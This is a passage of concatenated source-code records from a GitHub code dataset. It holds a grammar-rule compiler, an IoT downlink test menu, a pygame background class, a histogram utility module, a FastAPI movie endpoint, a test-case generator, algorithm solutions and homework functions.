(lOptionLines):\n \"returns a dictionary with data about options\"\n sLang = \"\"\n lStructOpt = []\n lOpt = []\n dOptLabel = {}\n for sLine in lOptionLines:\n sLine = sLine.strip()\n if sLine.startswith(\"OPTGROUP/\"):\n m = re.match(\"OPTGROUP/([a-z0-9]+):(.+)$\", sLine)\n lStructOpt.append( (m.group(1), list(map(str.split, m.group(2).split(\",\")))) )\n elif sLine.startswith(\"OPTSOFTWARE:\"):\n lOpt = [ [s, {}] for s in sLine[12:].strip().split() ] # don’t use tuples (s, {}), because unknown to JS\n elif sLine.startswith(\"OPT/\"):\n m = re.match(\"OPT/([a-z0-9]+):(.+)$\", sLine)\n for i, sOpt in enumerate(m.group(2).split()):\n lOpt[i][1][m.group(1)] = eval(sOpt)\n elif sLine.startswith(\"OPTLANG/\"):\n m = re.match(\"OPTLANG/([a-z][a-z](?:_[A-Z][A-Z]|)):(.+)$\", sLine)\n sLang = m.group(1)[:2]\n dOptLabel[sLang] = { \"__optiontitle__\": m.group(2).strip() }\n elif sLine.startswith(\"OPTLABEL/\"):\n m = re.match(\"OPTLABEL/([a-z0-9]+):(.+)$\", sLine)\n dOptLabel[sLang][m.group(1)] = list(map(str.strip, m.group(2).split(\"|\"))) if \"|\" in m.group(2) else [m.group(2).strip(), \"\"]\n else:\n echo(\"# Error. Wrong option line in:\\n \")\n echo(sLine)\n echo(\" options defined for: \" + \", \".join([ t[0] for t in lOpt ]))\n dOptions = { \"lStructOpt\": lStructOpt, \"dOptLabel\": dOptLabel }\n dOptions.update({ \"dOpt\"+k: v for k, v in lOpt })\n return dOptions\n\n\ndef make (lRules, sLang, bJavaScript):\n \"compile rules\"\n\n # removing comments, zeroing empty lines, creating definitions, storing tests, merging rule lines\n echo(\" parsing rules...\")\n global DEF\n lLine = []\n lRuleLine = []\n lTest = []\n lOpt = []\n for i, sLine in enumerate(lRules, 1):\n if sLine.startswith('#END'):\n break\n elif sLine.startswith(\"#\"):\n pass\n elif sLine.startswith(\"DEF:\"):\n m = re.match(\"DEF: +([a-zA-Z_][a-zA-Z_0-9]*) +(.+)$\", sLine.strip())\n if m:\n DEF[\"{\"+m.group(1)+\"}\"] = m.group(2)\n else:\n print(\"Error in definition: \", end=\"\")\n echo(sLine.strip())\n elif sLine.startswith(\"TEST:\"):\n lTest.append(\"{:<8}\".format(i) + \" \" + sLine[5:].lstrip())\n elif sLine.startswith(\"TODO:\"):\n pass\n elif sLine.startswith((\"OPTGROUP/\", \"OPTSOFTWARE:\", \"OPT/\", \"OPTLANG/\", \"OPTLABEL/\")):\n lOpt.append(sLine)\n elif re.match(\"[  \\t]*$\", sLine):\n pass\n elif sLine.startswith((\" \", \"\\t\")):\n lRuleLine[len(lRuleLine)-1][1] += \" \" + sLine.strip()\n else:\n lRuleLine.append([i, sLine.strip()])\n\n # generating options files\n echo(\" parsing options...\")\n dOptions = prepareOptions(lOpt)\n #echo(dOptions)\n\n # generating test files\n echo(\" generating test files...\")\n with open(\"tests/\"+sLang+\"/gc_test.txt\", \"w\", encoding=\"utf-8\") as hDstPy, \\\n open(\"gc_lang/\"+sLang+\"/modules-js/tests_data.json\", \"w\", encoding=\"utf-8\") as hDstJS:\n hDstPy.write(\"# TESTS FOR LANG [\"+sLang+\"]\\n\\n\")\n for sLine in lTest:\n hDstPy.write(sLine)\n hDstJS.write('{ \"aData\": ' + json.dumps(lTest, ensure_ascii=False) + \" }\\n\")\n\n # processing\n echo(\" preparing rules...\")\n bParagraph = True\n lParagraphRules = []\n lSentenceRules = []\n lParagraphRulesJS = []\n lSentenceRulesJS = []\n\n for nLine, sLine in lRuleLine:\n if sLine:\n if sLine == \"[++]\":\n bParagraph = False\n else:\n aRule = createRule(sLine, nLine, sLang, bParagraph)\n if aRule:\n if bParagraph:\n lParagraphRules.append(aRule)\n lParagraphRulesJS.append(pyRuleToJS(aRule))\n else:\n lSentenceRules.append(aRule)\n lSentenceRulesJS.append(pyRuleToJS(aRule))\n\n # creating file with all functions callable by rules\n echo(\" creating callables...\")\n with open(\"gc_lang/\"+sLang+\"/modules/gc_tmp_eval.py\", \"w\", encoding=\"utf-8\") as hDstPy, \\\n open(\"gc_lang/\"+sLang+\"/modules-js/gc_tmp_eval.js\", \"w\", encoding=\"utf-8\") as hDstJS:\n hDstPy.write(\"# generated code, do not edit\\n\")\n hDstJS.write(\"// generated code, do not edit\\nconst oEvalFunc = {\\n\")\n for sFuncName, sReturn in FUNCTIONS:\n cType = sFuncName[0:1]\n if cType == \"c\": # condition\n sParams = \"s, sx, m, dDA, sCountry, bCondMemo\"\n elif cType == \"m\": # message\n sParams = \"s, m\"\n elif cType == \"s\": # suggestion\n sParams = \"s, m\"\n elif cType == \"p\": # preprocessor\n sParams = \"s, m\"\n elif cType == \"d\": # disambiguator\n sParams = \"s, m, dDA\"\n else:\n print(\"# Unknown function type in [\" + sFuncName + \"]\")\n continue\n hDstPy.write(\"def {} ({}):\\n\".format(sFuncName, sParams))\n hDstPy.write(\" return \" + sReturn + \"\\n\")\n hDstJS.write(\" {}: function ({})\".format(sFuncName, sParams) + \" {\\n\")\n hDstJS.write(\" return \" + py2js(sReturn) + \";\\n\")\n hDstJS.write(\" },\\n\")\n hDstJS.write(\"}\\n\")\n\n displayStats(lParagraphRules, lSentenceRules)\n\n d = { \"paragraph_rules\": mergeRulesByOption(lParagraphRules),\n \"sentence_rules\": mergeRulesByOption(lSentenceRules),\n \"paragraph_rules_JS\": writeRulesToJSArray(mergeRulesByOption(lParagraphRulesJS)),\n \"sentence_rules_JS\": writeRulesToJSArray(mergeRulesByOption(lSentenceRulesJS)) }\n d.update(dOptions)\n\n return d\n","repo_name":"maelvls/grammalecte","sub_path":"compile_rules.py","file_name":"compile_rules.py","file_ext":"py","file_size_in_byte":26707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3915708331","text":"import server\nimport os\nimport command\nimport time\nimport cases\n\ndev_id=server.get_dev_id()\nos.system(\"cls\")\nserver.connect()\n\nprint(\"Comandos Manuais -- Dev ID: \",dev_id,\"\\n\")\n\nwhile True:\n option = int(input(\"Escolha uma opção:\\n0-Enviar 0077\\n1-Enviar 0033\\n2-Enviar 0011\\n3-Mudar Keep Alive\\n\"\n \"4-Mudar Warn Tx\\n5-Mudar Warn Period\\n6-Mudar Limiar da Bateria\\n7-Mudar Limiar de Luminosidade\\n\"\n \"8-Mudar Configurações do Acelerômetro\\n9-Fazer um Downlink Múltiplo\\n10- Resetar a Placa\\n\"\n \"11- Sair da Interrupção\\n\\nOpção:\"))\n\n print(\"\\n\")\n\n if option == 0:\n server.enviar(\"0077\",6)\n print(\"Downlink 0077 agendado! Aguardando uplink...\")\n server.esperar()\n elif option == 1:\n server.enviar(\"0033\", 5)\n print(\"Downlink 0033 agendado! Aguardando uplink...\")\n server.esperar()\n elif option == 2:\n server.enviar(\"0011\", 3)\n print(\"Downlink 0011 agendado! Aguardando uplink...\")\n server.esperar()\n elif option == 3:\n value = int(input(\"Insira o novo Keep Alive em segundos: \"))\n command.change_keepAlive(value)\n elif option == 4:\n value = int(input(\"Insira o novo Warn Tx em segundos: \"))\n command.change_warnTx(value)\n elif option == 5:\n value = int(input(\"Insira o novo Warn Period em segundos: \"))\n command.change_warnPeriod(value)\n elif option == 6:\n value = float(input(\"Insira o novo Limiar de Bateria: \"))\n command.change_batteryLevel(value)\n elif option == 7:\n value = int(input(\"Insira o novo Limiar de Luz: \"))\n command.change_lum(value)\n elif option == 8:\n time = float(input(\"Insira o novo Tempo em segundos: \"))\n queda = int(input(\"Insira o novo Limiar de queda (em mg): \"))\n ang = int(input(\"Insira o novo Limiar de inclinação (em graus): \"))\n command.change_acc(time,ang,queda)\n elif option == 9:\n ka = int(input(\"Insira o novo Keep Alive em segundos: \"))\n wtx = int(input(\"Insira o novo Warn Tx em segundos: \"))\n wp = int(input(\"Insira o novo Warn Period em segundos: \"))\n bl = float(input(\"Insira o novo Limiar de Bateria: \"))\n lum = int(input(\"Insira o novo Limiar de Luz: \"))\n time = float(input(\"Insira o novo Tempo em segundos: \"))\n queda = int(input(\"Insira o novo Limiar de queda (em mg): \"))\n ang = int(input(\"Insira o novo Limiar de inclinação (em graus): \"))\n command.multiple_downlink(ka,wp,wtx,bl,lum,time,ang,queda)\n elif option == 10:\n command.reiniciar()\n elif option == 11:\n cases.stop_interruption()\n else:\n print(\"Comando fora das opções dadas\")\n print(\"Downlink Enviado!\")\n time.sleep(2)\n os.system(\"cls\")\n","repo_name":"IBTI-Brasilia/Furukawa","sub_path":"Furukawa/Documentos Tecnicos/Script Gravação/Scripts Testes/manual_test.py","file_name":"manual_test.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14077110701","text":"from sqlmodel import Session, create_engine\n\nengine = create_engine(\n 'sqlite:///belte-og-seler.db',\n connect_args={'check_same_thread': False}, # Needed for SQLite\n echo=True, # Log generated SQL\n)\n\n\ndef get_session():\n with Session(engine) as session:\n yield session\n","repo_name":"sthagen/belte-og-seler","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"41094900354","text":"from game import sequenceIntialization,screen,WINDOWWIDTH,WINDOWHEIGHT,INGREDIENTSWIDTH,INGREDIENTSHEIGHT\nimport pygame\n\n#배경 클래스(인게임 내 배경갱신)\nclass Background():\n\n def __init__(self):\n # 배경\n self.background = []\n\n self.backgroundCount = 0\n\n self.foodGround = pygame.image.load(\"resource/image/background/foodGround.png\")\n self.backgroundCount=0\n\n self.SIDEPANELSIZE=21\n self.sidepanel = pygame.image.load(\"resource/image/ui/sidepanel.png\")\n \"\"\"\n self.ingredients = [pygame.image.load(\"resource/image/ingredients/ing_01.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_02.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_03.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_04.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_05.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_06.png\")] # 식재이미지\n \n \n \"\"\"\n self.ingredients = []\n self.ingredients = sequenceIntialization(self.ingredients,8,\"resource/image/ingredients/ingTrans/\",3)\n self.ingredientsTrnasCount=0\n self.ingredientsOutputPos=[0,WINDOWHEIGHT-INGREDIENTSHEIGHT-8]\n self.ingredientsPos = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]\n for i in range(0, len(self.ingredientsPos)):\n self.ingredientsPos[i] = [INGREDIENTSWIDTH * i, WINDOWHEIGHT - INGREDIENTSHEIGHT]\n\n\n def updatefrontofClientLayer(self,ingNum):\n # 손님 앞 레이어구조물 출력\n screen.blit(self.sidepanel, (0, 0))\n screen.blit(self.sidepanel, (WINDOWWIDTH - self.SIDEPANELSIZE, 0))\n screen.blit(self.foodGround, (0, WINDOWHEIGHT - 186))\n if ingNum==0 :\n if self.ingredientsTrnasCount==0:\n screen.blit(self.ingredients[0],self.ingredientsOutputPos)\n else:\n if self.ingredientsTrnasCount!=0:\n self.ingredientsTrnasCount-=1\n screen.blit(self.ingredients[self.ingredientsTrnasCount],self.ingredientsOutputPos)\n elif ingNum==1:\n if self.ingredientsTrnasCount==7:\n screen.blit(self.ingredients[7],self.ingredientsOutputPos)\n else:\n if self.ingredientsTrnasCount!=7:\n self.ingredientsTrnasCount+=1\n screen.blit(self.ingredients[self.ingredientsTrnasCount],self.ingredientsOutputPos)\n\n def setbackground(self,directory):\n while len(self.background)>0 : self.background.pop()\n self.background = sequenceIntialization(self.background, 60, \"resource/image/background/\"+directory, 3)\n\n def backgroundLayerupdate(self,gamescene):\n self.backgroundCount+=1\n if self.backgroundCount>=59:\n self.backgroundCount=0\n if gamescene==0:\n screen.blit(self.background[self.backgroundCount], (0, 0))\n elif gamescene==1:\n screen.blit(self.background[self.backgroundCount],(0,20))\n elif gamescene==2:\n screen.blit(self.background[self.backgroundCount], (0, 0))","repo_name":"l3la3a/termproject","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9885617188","text":"n, k = map(int, input().split())\nls = list(map(int, input().split()))\n\nplug = []\nans = 0\nfor i in range(k):\n if ls[i] in plug: # \n continue\n\n elif len(plug) < n:\n plug.append(ls[i])\n continue\n \n tmp = 0\n far_one = 0\n for j in plug:\n if j not in ls[i:]:\n tmp = j\n break\n elif ls[i:].index(j) > far_one:\n far_one = ls[i:].index(j)\n tmp = j\n plug[plug.index(tmp)] = ls[i]\n ans += 1\n\nprint(ans)\n","repo_name":"swanim/Algorithm","sub_path":"baekjoon/2023-05/1700.py","file_name":"1700.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9012012716","text":"from DeepTextSearch import TextEmbedder\nimport pandas as pd\nimport re\n\npoem_data = pd.read_csv(\"data/Arabic Poem Comprehensive Dataset (APCD).csv\")\ndf_hadith = poem_data[(poem_data['العصر'] == 'الحديث')]\n\nverses = list(df_hadith['البيت'])\n# Load data from CSV file\ndef remove_diacritics(text: str) -> str:\n # Remove tashkeel\n text = re.sub(r'[\\u0617-\\u061A\\u064B-\\u0652]', '', text)\n\n # Remove tatweel\n text = re.sub(r'\\u0640', '', text)\n\n return text\n\n\ncleaned_poet = []\nfor x in verses:\n cleaned_verse = remove_diacritics(x)\n cleaned_poet.append(cleaned_verse)\n\n# To use Searching, we must first embed data. After that, we must save all of the data on the local path.\nt_embedder = TextEmbedder()\n\nt_embedder.embed(corpus_list=cleaned_poet)\n\n\n\n","repo_name":"YoussefSaad1/eqtibas","sub_path":"fv_extraction.py","file_name":"fv_extraction.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23985252196","text":"\"\"\"Helper function for histogram handling.\"\"\"\nfrom __future__ import annotations\n\nimport numpy as np\n\nfrom puma.utils.logging import logger\n\n\ndef save_divide(\n numerator,\n denominator,\n default: float = 1.0,\n):\n \"\"\"\n Division using numpy divide function returning default value in cases where\n denominator is 0.\n\n Parameters\n ----------\n numerator: array_like, int, float\n Numerator in the ratio calculation.\n denominator: array_like, int, float\n Denominator in the ratio calculation.\n default: float\n Default value which is returned if denominator is 0.\n\n Returns\n -------\n ratio: array_like, float\n \"\"\"\n if isinstance(numerator, (int, float, np.number)) and isinstance(\n denominator, (int, float, np.number)\n ):\n output_shape = 1\n else:\n try:\n output_shape = denominator.shape\n except AttributeError:\n output_shape = numerator.shape\n\n ratio = np.divide(\n numerator,\n denominator,\n out=np.ones(\n output_shape,\n dtype=float,\n )\n * default,\n where=(denominator != 0),\n )\n if output_shape == 1:\n return float(ratio)\n return ratio\n\n\ndef hist_w_unc(\n arr,\n bins,\n bins_range=None,\n normed: bool = True,\n weights: np.ndarray = None,\n underoverflow: bool = False,\n):\n \"\"\"\n Computes histogram and the associated statistical uncertainty.\n\n Parameters\n ----------\n arr : array_like\n Input data. The histogram is computed over the flattened array.\n bins : int or sequence of scalars or str\n `bins` parameter from `np.histogram`\n bins_range : tuple, optional\n `range` parameter from `np.histogram`. This is ignored if `bins` is array like,\n because then the entries of `bins` are used as bin edges.\n normed : bool, optional\n If True (default) the calculated histogram is normalised to an integral\n of 1.\n weights : np.ndarray, optional\n Weights for the input data. Has to be an array of same length as the input\n data with a weight for each entry. If not specified, weight 1 will be given\n to each entry. The uncertainty of bins with weighted entries is\n sqrt(sum_i{w_i^2}) where w_i are the weights of the entries in this bin.\n By default None.\n underoverflow : bool, optional\n Option to include under- and overflow values in outermost bins.\n\n Returns\n -------\n bin_edges : array of dtype float\n Return the bin edges (length(hist)+1)\n hist : numpy array\n The values of the histogram. If normed is true (default), returns the\n normed counts per bin\n unc : numpy array\n Statistical uncertainty per bin.\n If normed is true (default), returns the normed values.\n band : numpy array\n lower uncertainty band location: hist - unc\n If normed is true (default), returns the normed values.\n \"\"\"\n if weights is None:\n weights = np.ones(len(arr))\n\n # Check if there are nan values in the input values\n nan_mask = np.isnan(arr)\n if np.sum(nan_mask) > 0:\n logger.warning(\"Histogram values contain %i nan values!\", np.sum(nan_mask))\n # Remove nan values\n arr = arr[~nan_mask]\n weights = weights[~nan_mask]\n\n # Check if there are inf values in the input values\n inf_mask = np.isinf(arr)\n if np.sum(inf_mask) > 0:\n logger.warning(\"Histogram values contain %i +-inf values!\", np.sum(inf_mask))\n\n # Calculate the counts and the bin edges\n counts, bin_edges = np.histogram(arr, bins=bins, range=bins_range, weights=weights)\n\n # calculate the uncertainty with sum of squared weights (per bin, so we use\n # np.histogram again here)\n unc = np.sqrt(\n np.histogram(arr, bins=bins, range=bins_range, weights=weights**2)[0]\n )\n\n if underoverflow:\n # add two dummy bins (from outermost bins to +-infinity)\n bins_with_overunderflow = np.hstack(\n [np.array([-np.inf]), bin_edges, np.array([np.inf])]\n )\n # recalculate the histogram with this adjusted binning\n counts, _ = np.histogram(arr, bins=bins_with_overunderflow, weights=weights)\n counts[1] += counts[0] # add underflow values to underflow bin\n counts[-2] += counts[-1] # add overflow values to overflow bin\n counts = counts[1:-1] # remove dummy bins\n\n # calculate the sum of squared weights\n sum_squared_weights = np.histogram(\n arr, bins=bins_with_overunderflow, weights=weights**2\n )[0]\n # add sum of squared weights from under/overflow values to under/overflow bin\n sum_squared_weights[1] += sum_squared_weights[0]\n sum_squared_weights[-2] += sum_squared_weights[-1]\n sum_squared_weights = sum_squared_weights[1:-1] # remove dummy bins\n\n unc = np.sqrt(sum_squared_weights) # uncertainty is sqrt(sum_squared_weights)\n\n if normed:\n sum_of_weights = float(np.sum(weights))\n counts = save_divide(counts, sum_of_weights, 0)\n unc = save_divide(unc, sum_of_weights, 0)\n\n band = counts - unc\n hist = counts\n\n return bin_edges, hist, unc, band\n\n\ndef hist_ratio(\n numerator,\n denominator,\n numerator_unc,\n denominator_unc,\n step: bool = True,\n):\n \"\"\"\n This method calculates the ratio of the given bincounts and\n returns the input for a step function that plots the ratio.\n\n Parameters\n ----------\n numerator : array_like\n Numerator in the ratio calculation.\n denominator : array_like\n Denominator in the ratio calculation.\n numerator_unc : array_like\n Uncertainty of the numerator.\n denominator_unc : array_like\n Uncertainty of the denominator.\n step : bool\n if True duplicates first bin to match with step plotting function,\n by default True\n\n\n Returns\n -------\n step_ratio : array_like\n Ratio returning 1 in case the denominator is 0.\n step_ratio_unc : array_like\n Stat. uncertainty of the step_ratio\n\n Raises\n ------\n AssertionError\n If inputs don't have the same shape.\n\n \"\"\"\n numerator, denominator, numerator_unc, denominator_unc = (\n np.array(numerator),\n np.array(denominator),\n np.array(numerator_unc),\n np.array(denominator_unc),\n )\n if numerator.shape != denominator.shape:\n raise AssertionError(\"Numerator and denominator don't have the same legth\")\n if numerator.shape != numerator_unc.shape:\n raise AssertionError(\"Numerator and numerator_unc don't have the same legth\")\n if denominator.shape != denominator_unc.shape:\n raise (\n AssertionError(\"Denominator and denominator_unc don't have the same legth\")\n )\n step_ratio = save_divide(numerator, denominator, 1 if step else np.inf)\n\n # Calculate rel uncertainties\n numerator_rel_unc = save_divide(\n numerator_unc, numerator, default=0 if step else np.inf\n )\n denominator_rel_unc = save_divide(\n denominator_unc, denominator, default=0 if step else np.inf\n )\n\n # Calculate rel uncertainty\n step_rel_unc = np.sqrt(numerator_rel_unc**2 + denominator_rel_unc**2)\n\n # Calculate final uncertainty\n step_unc = step_ratio * step_rel_unc\n\n if step:\n # Add an extra bin in the beginning to have the same binning as the input\n # Otherwise, the ratio will not be exactly above each other (due to step)\n step_ratio = np.append(np.array([step_ratio[0]]), step_ratio)\n step_unc = np.append(np.array([step_rel_unc[0]]), step_rel_unc) * step_ratio\n\n return step_ratio, step_unc\n","repo_name":"umami-hep/puma","sub_path":"puma/utils/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"32141778804","text":"#! /usr/bin/python3\n# -*- codeing = utf-8 -*-\n'''\n@Time : 2023/1/2 12:04\n@Author : Jocx-H\n@File : movieFrontAction.py\n@Desc : 前端首页调用电影的api\n'''\n\n\nimport traceback\nfrom fastapi import APIRouter, Query, Path, HTTPException\nfrom fastapi.encoders import jsonable_encoder\n\nfrom action.msgCodeConf import Code400\nfrom Service import movieFrontService\n\n\n# 构建api路由\nrouter = APIRouter(\n prefix=\"/mfront\",\n tags=[\"MovieFront\"],\n)\n\n\n@router.post(\"/movielist\", responses={400: {\"model\": Code400}})\ndef getMovieList(tag: int, page_count: int):\n r\"\"\"\n 返回每个分类的每一页的电影列表\n \"\"\"\n try:\n movies = movieFrontService.getMovieList(tag, page_count)\n except HTTPException as e:\n raise e\n except Exception as e:\n print(repr(e))\n traceback.print_exc()\n raise HTTPException(status_code=400, detail=Code400.detail)\n return jsonable_encoder(movies)","repo_name":"Jocx-H/MovieRecommoned","sub_path":"back/action/movieFrontAction.py","file_name":"movieFrontAction.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16691669579","text":"'''\n## Problem Statement ##\nMunna Bhai is up to his antics again. This time his chacha is coming from the village and seeing what Munna is doing. This would be all good except that Munna's chacha thinks that Munna is software programmer. He needs to get a degree fast to prove that he is one. Luckily, he found an institution who after seeing Munna's enthusiasm, the dean offered him an experimental exam format. He would give Munna 6 exams based on the same problem. He needs to just write the answer for the questions in those exams. The number of exams correctly solved will be the number of certifications Munna receives.\nThe problem was as follows:\nGiven a string of characters and a start and end index, find the number of distinct substrings in the range, both inclusive. Munna being Munna, he wore his airpods to the exam, hidden under his beanie. He tells you the string over the phone and the start and end index. You need to tell him the answer for every case.\nNote\nDistinct substrings of 'aabb',1,3 are 'a', 'b', 'ab', 'bb', 'abb'\n\n## Input Format ##\nFirst line: t test cases\nNext 2t lines:\nString s\nstart end\n\n## Constraints ##\n1 ≤ t ≤ 25000\n1 ≤ |s| ≤ 100\n1 ≤ start ≤ end ≤ |s|\n\n## Output Format ##\nFor each question, print a single line containing the integer\n'''\nimport os\nimport datetime\nimport helper\nfrom helper import TEST_DIR, INPUT_DIR, OUTPUT_DIR, INPUT_PRE, OUTPUT_PRE, FILE_EXT\nPROBLEM_NUM = '02' # Change according to problem number in contest\n\n# Solution\ndef distinct_substrings(string, start, end):\n sub = string[start:end+1]\n subs = []\n for i in range(len(sub)):\n for j in range(i, len(sub)):\n subs.append(sub[i:j+1])\n return len(set(subs))\n\n\n# Sample cases\nprint()\nSAMPLE = [\n {'string': 'aabb', 'start': 1, 'end': 3},\n {'string': 'aabbcc', 'start': 2, 'end': 5},\n {'string': 'vwznubfitkdexrqqmedtycnfk', 'start': 12, 'end': 17},\n {'string': 'nlovipenxsdekjhpumufpdxqmhppsenky', 'start': 16, 'end': 25},\n]\nprint('Sample Output:')\nfor sample in SAMPLE:\n print(distinct_substrings(sample['string'],sample['start'],sample['end']))\nprint()\n\n\n# Build tests\nfnum = input(\"Enter testfile num: \")\nfin = open(os.path.join(os.path.join(os.path.join(TEST_DIR,PROBLEM_NUM),INPUT_DIR),INPUT_PRE+fnum+FILE_EXT),'w')\nfout = open(os.path.join(os.path.join(os.path.join(TEST_DIR,PROBLEM_NUM),OUTPUT_DIR),OUTPUT_PRE+fnum+FILE_EXT),'w')\nt = int(input(\"Test cases: \"))\nfin.write(str(t)+'\\n')\n\nTIME = []\nfor i in range(t):\n # Inputs\n n = helper.get_random(1,2,100)\n string = ''.join(chr(96+x) for x in helper.get_random(n,1,26))\n start = helper.get_random(1,0,n-1)\n end = helper.get_random(1,start,n-1)\n # Result\n START = datetime.datetime.now()\n res = distinct_substrings(string,start,end)\n END = datetime.datetime.now()\n TIME.append(END-START)\n # File write\n print(i,res)\n input_line = string + '\\n' + str(start) + ' ' + str(end)\n output_line = str(res)\n if i+1 s3 => s1 + s2 + s3 > s3 + s3\n # s2 + s3 > s1 => s1 + s2 + s3 > s1 + s1\n # s1 + s3 > s2 => s2 + s1 + s3 > s2 + s2\n if (s1 <= 0) or (s2 <= 0) or (s3 <= 0): return False\n longestSide = max(s1, s2, s3)\n return 2 * longestSide < (s1 + s2 + s3)\n\ndef distance(x1, y1, x2, y2):\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\ndef isRightTriangle(x1, y1, x2, y2, x3, y3):\n s1 = distance(x1, y1, x2, y2)\n s2 = distance(x2, y2, x3, y3)\n s3 = distance(x3, y3, x1, y1)\n\n if isLegalTriangle(s1,s2, s3):\n hypotenuse = max(s1, s2, s3)\n if math.isclose(hypotenuse, s3):\n if math.isclose((s3 ** 2), (s1 ** 2 + s2 ** 2)): return True\n elif math.isclose(hypotenuse, s2):\n if math.isclose((s2 ** 2), (s1 ** 2 + s3 ** 2)): return True\n elif math.isclose(hypotenuse, s1):\n if math.isclose((s1 ** 2), (s2 ** 2 + s3 ** 2)): return True\n\n return False\n\ndef extractColor(rgb, component):\n if component == 'R':\n return rgb // (10 ** 6)\n elif component == 'G':\n return (rgb % (10 ** 6)) // (10 ** 3)\n elif component == 'B':\n return rgb % (10 ** 3)\n else:\n return 0\n\ndef colorBlender(rgb1, rgb2, midpoints, n):\n\n if n < 0 or n > midpoints + 1:\n return None\n\n nGaps = midpoints + 1\n\n r1 = extractColor(rgb1, 'R')\n g1 = extractColor(rgb1, 'G')\n b1 = extractColor(rgb1, 'B')\n\n r2 = extractColor(rgb2, 'R')\n g2 = extractColor(rgb2, 'G')\n b2 = extractColor(rgb2, 'B')\n\n deltaR = (r2 - r1) / nGaps\n deltaG = (g2 - g1) / nGaps\n deltaB = (b2 - b1) / nGaps\n\n nthR = roundHalfUp(r1 + (n * deltaR))\n nthG = roundHalfUp(g1 + (n * deltaG))\n nthB = roundHalfUp(b1 + (n * deltaB))\n\n return (nthR * (10 ** 6)) + (nthG * (10 ** 3)) + nthB\n\ndef bonusFindIntRootsOfCubic(a, b, c, d) :\n p = (-1) * (b / (3 * a))\n q = (p ** 3) + (((b * c) -(3 * a * d))/(6 * a * a))\n r = c / (3 * a)\n\n # Given one real root, the equation can be decomposed to get the form below:\n # ax^3 + bx^2 + cx + d = (x - root1)(ax^2 + (b + a * root1)x + c + b * root1 + a * root1^2)\n #Quadratic Equation: ax^2 + (b + a * root1)x + c + b * root1 + a * root1^2\n\n # Extract the real part of the (possibly) complex root. Ignore the imaginary part.\n root1 = ((q + (((q ** 2) + ((r - (p ** 2)) ** 3)) ** 0.5)) ** (1/3) + \\\n (q - (((q ** 2) + ((r - (p ** 2)) ** 3)) ** 0.5)) ** (1/3) + p).real\n\n # Solve the quadratic equation for the other two roots. Again, extract the real\n # part of the complex number as z.real, where z is complex.\n aq = a\n bq = b + (a * root1)\n cq = c + (b * root1) + (a * (root1 ** 2))\n\n # Cannot use math.sqrt() for negative values. Use pow instead.\n root2 = (((-1) * bq + pow(((bq ** 2) - (4 * aq * cq)),0.5)) / (2 * aq)).real\n root3 = (((-1) * bq - pow(((bq ** 2) - (4 * aq * cq)),0.5)) / (2 * aq)).real\n\n # The solution is guaranteed to be integers for the exercise. Hence, round to\n # the nearest integer with ties going away from zero.\n root1 = roundHalfUp(root1)\n root2 = roundHalfUp(root2)\n root3 = roundHalfUp(root3)\n\n # Sort the three roots in ascending order\n rmin = min(root1, root2, root3)\n rmax = max(root1, root2, root3)\n rmid = root1 + root2 + root3 - (rmin + rmax)\n\n return rmin, rmid, rmax\n\n#################################################\n# Hw1 Test Functions\n#################################################\n\ndef testFabricYards():\n print('Testing fabricYards()... ', end='')\n assert(fabricYards(0) == 0)\n assert(fabricYards(1) == 1)\n assert(fabricYards(35) == 1)\n assert(fabricYards(36) == 1)\n assert(fabricYards(37) == 2)\n assert(fabricYards(72) == 2)\n assert(fabricYards(73) == 3)\n assert(fabricYards(108) == 3)\n assert(fabricYards(109) == 4)\n print('Passed.')\n \ndef testFabricExcess():\n print('Testing fabricExcess()... ', end='')\n assert(fabricExcess(0) == 0)\n assert(fabricExcess(1) == 35)\n assert(fabricExcess(35) == 1)\n assert(fabricExcess(36) == 0)\n assert(fabricExcess(37) == 35)\n assert(fabricExcess(72) == 0)\n assert(fabricExcess(73) == 35)\n assert(fabricExcess(108) == 0)\n assert(fabricExcess(109) == 35)\n print('Passed.')\n\ndef testIsRightTriangle():\n print('Testing isRightTriangle()... ', end='')\n assert(isRightTriangle(0, 0, 0, 3, 4, 0) == True)\n assert(isRightTriangle(1, 1.3, 1.4, 1, 1, 1) == True)\n assert(isRightTriangle(9, 9.12, 8.95, 9, 9, 9) == True)\n assert(isRightTriangle(0, 0, 0, math.pi, math.e, 0) == True)\n assert(isRightTriangle(0, 0, 1, 1, 2, 0) == True)\n assert(isRightTriangle(0, 0, 1, 2, 2, 0) == False)\n assert(isRightTriangle(1, 0, 0, 3, 4, 0) == False)\n print('Passed.')\n\ndef testColorBlender():\n print('Testing colorBlender()... ', end='')\n # http://meyerweb.com/eric/tools/color-blend/#DC143C:BDFCC9:3:rgbd\n assert(colorBlender(220020060, 189252201, 3, -1) == None)\n assert(colorBlender(220020060, 189252201, 3, 0) == 220020060)\n assert(colorBlender(220020060, 189252201, 3, 1) == 212078095)\n assert(colorBlender(220020060, 189252201, 3, 2) == 205136131)\n assert(colorBlender(220020060, 189252201, 3, 3) == 197194166)\n assert(colorBlender(220020060, 189252201, 3, 